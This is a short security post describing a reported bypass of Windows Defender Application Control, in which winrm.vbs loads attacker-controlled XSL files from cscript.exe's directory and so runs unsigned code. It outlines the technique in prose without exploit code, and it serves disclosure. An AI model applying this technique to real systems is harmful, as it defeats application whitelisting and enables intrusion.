Microsoft winrm.vbs Security Bypass
winrm.vbs (a Windows-signed script in System32) is able to consume and execute attacker-controlled XSL which is not subject to “enlightened script host” restrictions, resulting in the execution of arbitrary, unsigned code execution.
When you supply “-format:pretty” or “-format:text” to winrm.vbs, it pulls WsmPty.xsl or WsmTxt.xsl respectively from the directory in which cscript.exe resides. This means that if an attacker copies cscript.exe to an attacker-controlled location where their malicious XSL resides, they will achieve arbitrary unsigned code execution. This issue is effectively identical to Casey Smith’s wmic.exe technique.
Because this technique affects Windows Defender Application Control (a serviceable security feature through MSRC), the issue was reported to Microsoft.
Further details – https://paper.tuisec.win/detail/40fb1eeac18a75d
Duncan is a technology professional with over 20 years experience of working in various IT roles. He has a interest in cyber security, and has a wide range of other skills in radio, electronics and telecommunications.